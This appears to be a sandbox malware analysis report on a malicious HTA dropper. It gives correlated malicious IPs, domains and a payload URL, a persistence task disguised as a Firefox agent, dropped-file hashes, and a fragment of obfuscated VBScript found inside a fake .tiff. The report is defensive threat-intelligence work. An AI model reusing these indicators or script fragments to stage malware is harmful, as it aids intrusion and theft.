Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target djvbaae, PID 3052 because it is empty
Execution Graph export aborted for target mshta.exe, PID 6736 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 5592 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6036 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6168 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta

Simulations

Behavior and APIs

Time	Type	Description
12:37:12	API Interceptor	109x Sleep call for process: powershell.exe modified
12:37:49	API Interceptor	24352x Sleep call for process: explorer.exe modified
12:38:38	API Interceptor	1x Sleep call for process: WerFault.exe modified
17:38:07	Task Scheduler	Run new task: Firefox Default Browser Agent 999F9F20696B12F1 path: C:\Users\user\AppData\Roaming\djvbaae

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
46.173.214.24	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	prolinice.ga/index.php
142.215.209.78	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse
	Order_Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse
	kissmegoodthingwhichgivemebestthignswithgirluaremy.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse
	bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer	Browse
	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse
	INQ02010391.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
107.172.44.178	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	107.172.44.178/53/WRFFRGT.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip.1017.filemail.com	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	142.215.209.78
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	142.215.209.78
	Order_Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	142.215.209.78
	kissmegoodthingwhichgivemebestthignswithgirluaremy.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	142.215.209.78
	bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer	Browse	142.215.209.78
	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse	142.215.209.78
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	142.215.209.78
	INQ02010391.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.215.209.78
prolinice.ga	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	46.173.214.24
	veryeasythingsevermadeforcreatenewthignsbetterthigns.hta	Get hash	malicious	Cobalt Strike, SmokeLoader	Browse	45.91.8.152
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf	Get hash	malicious	SmokeLoader	Browse	185.251.91.119
	40830001.xls	Get hash	malicious	SmokeLoader	Browse	185.251.91.119
	#20240627_Edlen_B.xls	Get hash	malicious	SmokeLoader	Browse	77.232.129.190
	171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe	Get hash	malicious	SmokeLoader	Browse	77.232.129.190
	#20240627_Edlen_A.xls	Get hash	malicious	SmokeLoader	Browse	77.232.129.190

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HUMBER-COLLEGECA	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	142.215.209.78
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	142.215.209.78
	Order_Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	142.215.209.78
	kissmegoodthingwhichgivemebestthignswithgirluaremy.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	142.215.209.78
	bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer	Browse	142.215.209.78
	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse	142.215.209.78
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	142.215.209.78
	INQ02010391.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.215.209.78
GARANT-PARK-INTERNETRU	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	46.173.214.24
	0HUxKfIvSV.exe	Get hash	malicious	Clipboard Hijacker	Browse	46.173.214.92
	0HUxKfIvSV.exe	Get hash	malicious	Clipboard Hijacker	Browse	46.173.214.92
	9xNI7vE1XO.exe	Get hash	malicious	Clipboard Hijacker	Browse	46.173.214.92
	9xNI7vE1XO.exe	Get hash	malicious	Clipboard Hijacker	Browse	46.173.214.92
	bacon.exe	Get hash	malicious	CobaltStrike	Browse	46.173.214.102
	UfRKIdsNvD.exe	Get hash	malicious	Clipboard Hijacker	Browse	46.173.214.92
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc, Vidar	Browse	46.173.214.86
	Lisect_AVT_24003_G1B_122.exe	Get hash	malicious	Unknown	Browse	46.173.211.166
	OYSVIdqcxa.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	91.203.193.134
AS-COLOCROSSINGUS	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	107.172.44.178
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	192.227.228.36
	FRSSDE.exe	Get hash	malicious	Remcos	Browse	192.227.228.36
	Order_Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	192.227.228.36
	kissmegoodthingwhichgivemebestthignswithgirluaremy.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	192.3.243.136
	bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer	Browse	192.3.243.136
	Signert kontrakt og faktura.xls	Get hash	malicious	Unknown	Browse	107.173.4.61
	New order.xls	Get hash	malicious	Unknown	Browse	192.3.220.29

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse	142.215.209.78
	Fluor RFQ1475#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	142.215.209.78
	Statement_of_account.vbs	Get hash	malicious	FormBook, GuLoader	Browse	142.215.209.78
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	142.215.209.78
	NoteID [4962398] _Secure_Document_Mrettinger-46568.docx	Get hash	malicious	HTMLPhisher	Browse	142.215.209.78
	DRP130636747.pdf	Get hash	malicious	Unknown	Browse	142.215.209.78
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	142.215.209.78
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.215.209.78
	Order88983273293729387293828PDF.exe	Get hash	malicious	Quasar	Browse	142.215.209.78
	https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854	Get hash	malicious	Unknown	Browse	142.215.209.78

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\djvbaae	kissmegoodthingwhichgivemebestthignswithgirluaremy.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse
	bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer	Browse
	invoice727282_PDF..exe	Get hash	malicious	AgentTesla	Browse
	#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse
	6038732).vbs	Get hash	malicious	Lokibot	Browse
	cirby0J3LP.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, XWorm, zgRAT	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	3vj5tYFb6a.exe	Get hash	malicious	Snake Keylogger, zgRAT	Browse
	50000PCSPIC12F1501-ESN.exe	Get hash	malicious	AgentTesla	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_explorer.exe_f0a768defacff880d8626d1749fd6d847b83e1c3_07ad8ade_da97e819-8219-46df-9a77-93ea3c16a62d\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9429489199670955
Encrypted:	false
SSDEEP:	192:W9woXeC6sQ0LZTkrjyaVwzuiF2Z24lO8k:1oOCJrLZTWjKzuiF2Y4lO8k
MD5:	D145220501D0074227609A67FD40E221
SHA1:	A0DE9104F90EF13BAD93A2B9F8C9B5ABCA7237A5
SHA-256:	0BD07D47A538F4DA22C83F0EA6D3CE65C4063500C5E57DC41FE357461B4614A6
SHA-512:	074918A7A4EA61D8A4F0025A53B12BBAA32C9A61B0AC9F1391099875ABA98246CE32E775BD8E3A45F05B4D58567764146B1484B2B8EAC77282FD85701442A4B7
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.4.2.5.0.9.7.3.9.2.3.8.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.4.2.5.0.9.8.3.4.5.5.0.9.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.9.7.e.8.1.9.-.8.2.1.9.-.4.6.d.f.-.9.a.7.7.-.9.3.e.a.3.c.1.6.a.6.2.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.d.3.7.f.4.0.-.8.6.e.9.-.4.0.b.2.-.b.2.3.f.-.e.7.d.9.2.8.0.c.b.e.6.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.9.c.-.0.0.0.1.-.0.0.1.4.-.8.9.d.3.-.d.a.a.4.e.0.3.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER503D.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Nov 18 17:38:17 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	58966
Entropy (8bit):	1.5430466762082595
Encrypted:	false
SSDEEP:	192:g/yDybE7RGMoO2pxdsNbx9B1WjPRDQvlGYb1Y:I4yA7bubshx9B1Wmv7pY
MD5:	48967CF654232BACDF869DD3BB67C4E0
SHA1:	AAD6FF03EE234202AB2C4F5E1142B8D0DD511D29
SHA-256:	72B37C97404821BB9D9B7AF1C7157652B3BF29D623B3E2FB236964E0A0A807D2
SHA-512:	4C38B97AFFBB0E8E825CAAA0EF53E37D0104AFC615948DA22F18A991F5A9BEA728F7FC74CF07F87A95915BFC1FE716575DC64F1927393DC58CF4693B440461E8
Malicious:	false
Preview:	MDMP..a..... ........{;g.........................................7..........T.......8...........T...........0...&...........L...........8...............................................................................eJ..............Lw......................T............{;g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5203.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8560
Entropy (8bit):	3.695576961050474
Encrypted:	false
SSDEEP:	192:R6l7wVeJx70p6Y9Sq8gmfqtjb0pDy89bcA4fsq0m:R6lXJdy6YIq8gmfqtj+cffZ
MD5:	A32F13589E88B88F43DB8A6D51CE3BEA
SHA1:	C9FFA4359D51319CE2D12F3E0FD0F09A69815FE9
SHA-256:	8AA2C26F9F2B25A9F1A25762B5427A9F56FA34FB38D803538ED162D5657C536F
SHA-512:	3BB8C4A6AEC5DE87A6704F57085FAD4E7DEA63B476DD34442E1357E4DFF1823D16F862C839195E6C352AC71E3F0BDAA64DA827D8316B3E76D16E4E81B42FD79D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.8.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5243.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4719
Entropy (8bit):	4.452107755392488
Encrypted:	false
SSDEEP:	48:cvIwWl8zsvJg771I9PYnWpW8VY7Ym8M4JYcFeNyq85M6Eb9Q39d:uIjfRI7IYW7VfJ4Fba39d
MD5:	5A45A1606A7B3A0920A8FB05A83CB1CF
SHA1:	5CC1651E1694B1B7DF3ADE16508AE2A0A265E90C
SHA-256:	4E911D9E7F035B97411E2EDE9AC34CAA9669EA65C6E9DFCCCB43F566B79195EB
SHA-512:	EB80E633AD964377F6C856C153509AD4055C4557624AFFCF1488C80AF152DE8C1E87D0E409F8BA7BFB5771998132B84ADE1C4460AD25CF5B04DBF9726C6ED2D4
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="593800" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\djvbaae.log

Download File

Process:	C:\Users\user\AppData\Roaming\djvbaae
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	311
Entropy (8bit):	5.347482639021185
Encrypted:	false
SSDEEP:	6:Q3La/xwchA2DLIP12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hhpDLI4M9tDLI4MWuPTAv
MD5:	1AC8524D3800CDD5A91A864BCD4C3AB5
SHA1:	D003AEE44AC954938CE83E4A80412E04F726EA83
SHA-256:	8652A0399D65C2D111841F66EF2E930CDB8291CC8203252D59FD4921FF336C02
SHA-512:	9F28B59B99D0BC1EB60D29BE54CE2DAAC7D9B5D895311169578383C19A46CCF7CDE498EB6D7F172CF7D1D11E5B16665DF989CD8EEC527282BE3B796CD08C7DAC
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seemybestnetworkwhichgivebestthingsentirelifewithme[1].tiff

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (377), with CRLF line terminators
Category:	dropped
Size (bytes):	141308
Entropy (8bit):	3.677460277464518
Encrypted:	false
SSDEEP:	1536:DBkSUTu5S/BV4Mf8mOZG3WVGwB7xW9xjqGuvcQ6T0+gt5pzBGwm:mSU/B2e8muG3WQwNjG4cQ6TZgt5p9Gwm
MD5:	855D024750A1BC1BC078E60C05E506E3
SHA1:	480C344EF4E060ADB7CA7E159C815CB38AC87614
SHA-256:	560327E8E4C818547FE966C8704D97270986B7457D62A154219E81ED4AFB4667
SHA-512:	64A68DD3C8750E7A90C95078DC1DB87086C546212B56348E6D45F4444B5DD7E6725F3B5DDBC2C414D08A7DF2FBF2EECD11B9AB414588AC7B66F57F70FBB85C94
Malicious:	false
Preview:	..........F.u.n.c.t.i.o.n. .e.n.g.o.m.a.d.e.l.a.(.B.y.V.a.l. .c.o.r.n.o.f.o.n.e.,. .B.y.V.a.l. .m.o.q.u.e.n.c.o.,. .B.y.V.a.l. .a.p.r.e.s.a.r.)..... . . . .D.i.m. .a.s.s.e.n.t.i.m.e.n.t.o..... . . . .a.s.s.e.n.t.i.m.e.n.t.o. .=. .I.n.S.t.r.(.c.o.r.n.o.f.o.n.e.,. .m.o.q.u.e.n.c.o.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .a.s.s.e.n.t.i.m.e.n.t.o. .>. .0..... . . . . . . . .c.o.r.n.o.f.o.n.e. .=. .L.e.f.t.(.c.o.r.n.o.f.o.n.e.,. .a.s.s.e.n.t.i.m.e.n.t.o. .-. .1.). .&. .a.p.r.e.s.a.r. .&. .M.i.d.(.c.o.r.n.o.f.o.n.e.,. .a.s.s.e.n.t.i.m.e.n.t.o. .+. .L.e.n.(.m.o.q.u.e.n.c.o.).)..... . . . . . . . .a.s.s.e.n.t.i.m.e.n.t.o. .=. .I.n.S.t.r.(.a.s.s.e.n.t.i.m.e.n.t.o. .+. .L.e.n.(.a.p.r.e.s.a.r.).,. .c.o.r.n.o.f.o.n.e.,. .m.o.q.u.e.n.c.o.)..... . . . .L.o.o.p..... . . . ..... . . . .e.n.g.o.m.a.d.e.l.a. .=. .c.o.r.n.o.f.o.n.e.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... .

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.901113710259376
Encrypted:	false
SSDEEP:	96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5:	7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1:	22813AF893013D1CCCACC305523301BB90FF88D9
SHA-256:	5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512:	D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\317A.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\317A.tmp-shm

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\391C.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3B8F.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
